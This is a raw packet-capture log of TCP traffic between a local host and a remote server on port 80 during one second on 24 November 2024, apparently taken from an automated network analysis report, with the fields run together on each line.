                                      Nov 24, 2024 12:05:09.607230902 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.607367992 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.607413054 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.608306885 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.608402967 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.608448982 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.609270096 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.609469891 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.609519005 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.610325098 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.610450029 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.610495090 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.611346960 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.611462116 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.611506939 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.612390995 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.612523079 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.612577915 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.613398075 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.613493919 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.613542080 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.614432096 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.614485979 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.614533901 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.615456104 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.615581036 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.615648031 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.616460085 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.616583109 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.616636038 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.617501020 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.617611885 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.617666006 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.618527889 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.618700027 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.618753910 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.619563103 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.619682074 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.619729996 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.620568037 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.620722055 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.620775938 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.621612072 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.621856928 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.621906042 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.622646093 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.622771025 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.622822046 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.623672962 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.623781919 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.623840094 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.624679089 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.624802113 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.624855042 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.625720978 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.625821114 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.625870943 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.626759052 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.626863956 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.626919985 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.627759933 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.627840996 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.627892017 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.628815889 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.628920078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.628971100 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.629836082 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.629957914 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.630012989 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.630884886 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.630935907 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.630985975 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.631881952 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.632097960 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.632148981 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.632909060 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.633025885 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.633078098 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.633928061 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.633981943 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.634031057 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.635030985 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.635169983 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.635222912 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.635997057 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.636050940 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.636116028 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.636985064 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.637111902 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.637165070 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.638057947 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.638112068 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.638164997 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.639051914 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.639154911 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.639209986 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.640100002 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.640235901 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.640290022 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.641174078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.641207933 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.641252995 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.642210007 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.642426014 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.642474890 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.643188000 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.643347979 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.643393993 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.644186020 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.644334078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.644386053 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.645212889 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.645379066 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.645431995 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.646323919 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.646418095 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.646469116 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.647356033 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.647408962 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.647456884 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.648297071 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.648401022 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.648454905 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.649307013 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.649451971 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.649502993 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.650336027 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.650557995 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.650607109 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.651408911 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.651462078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.651524067 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.652398109 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.652546883 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.652592897 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.653436899 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.653532982 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.653583050 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.654474974 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.654656887 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.654712915 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.655518055 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.655642986 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.655694962 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.656505108 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.656625032 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.656691074 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.657550097 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.701176882 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.796360016 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.796417952 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.796477079 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.796827078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.796994925 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.797044992 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.797873020 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.798034906 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.798131943 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.798959970 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.799089909 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.799150944 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.799840927 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.799987078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.800045967 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.801018000 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.801189899 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.801245928 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.801943064 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.802098036 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.802154064 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.802932978 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.803057909 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.803106070 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.804013014 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.804248095 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.804303885 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.804984093 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.805109024 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.805159092 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.806032896 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.806116104 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.806171894 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.807126045 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.807287931 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.807351112 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.808104038 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.808275938 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.808330059 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.809216022 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.809269905 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.809314013 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.810184002 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.810307980 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.810354948 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.811296940 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.811500072 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.811547995 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.812334061 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.812530041 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.812588930 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.813314915 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.813438892 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.813489914 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.814349890 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.814404011 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.814451933 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.815356970 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.815448046 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.815498114 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.816637039 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.816670895 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.816724062 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.817322016 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.817450047 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.817502022 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.818351030 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.818445921 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.818538904 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.819483042 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.819534063 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.819582939 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.820404053 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.820547104 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.820596933 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.821413994 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.821562052 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.821614027 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.822491884 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.822693110 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.822742939 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.823472977 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.823620081 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.823668003 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.824561119 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.824673891 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.824728012 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.825534105 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.825695992 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.825747013 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.826941967 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.826977968 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.827028990 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.827606916 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.827811956 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.827857971 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.828608990 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.828885078 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.828979015 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.829684973 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.829843044 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.829891920 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.830734968 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.831145048 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.831196070 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.832043886 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.832143068 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.832192898 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.832847118 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.833031893 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.833081961 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.833851099 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.833931923 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.833981037 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.834790945 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.834913969 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.834963083 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.836112022 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.836298943 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.836347103 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.837286949 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.837394953 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.837445021 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.838346004 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.838562012 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.838608027 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.839382887 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.839503050 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.839593887 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.840543985 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.840639114 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.840691090 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.841645956 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.841748953 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.841797113 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.842663050 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.842755079 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.842808962 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.843611956 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.843745947 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.843796015 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.844405890 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.844542980 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.844593048 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.845372915 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.845498085 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.845566988 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.846204042 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.846347094 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.846395969 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.847421885 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.847568035 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.847616911 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.848149061 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.848356009 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.848401070 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.849126101 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.849229097 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.849276066 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.850131035 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.904215097 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.988544941 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.988611937 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.988750935 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.988979101 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.989114046 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.989185095 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.990005970 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.990133047 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.990200996 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.991080046 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.991156101 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.991228104 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.992053032 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.992182016 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.992232084 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.993124008 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.993402004 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.993451118 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.994105101 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.994230032 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.994278908 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.995146036 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.995402098 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.995449066 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.996151924 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.996251106 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.996299028 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.997293949 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.997395039 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.997442961 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.998198032 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.998342991 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.998389959 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:09.999263048 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.999392986 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:09.999444962 CET4982980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:10.000282049 CET8049829178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:10.000365973 CET8049829178.215.224.74192.168.2.5
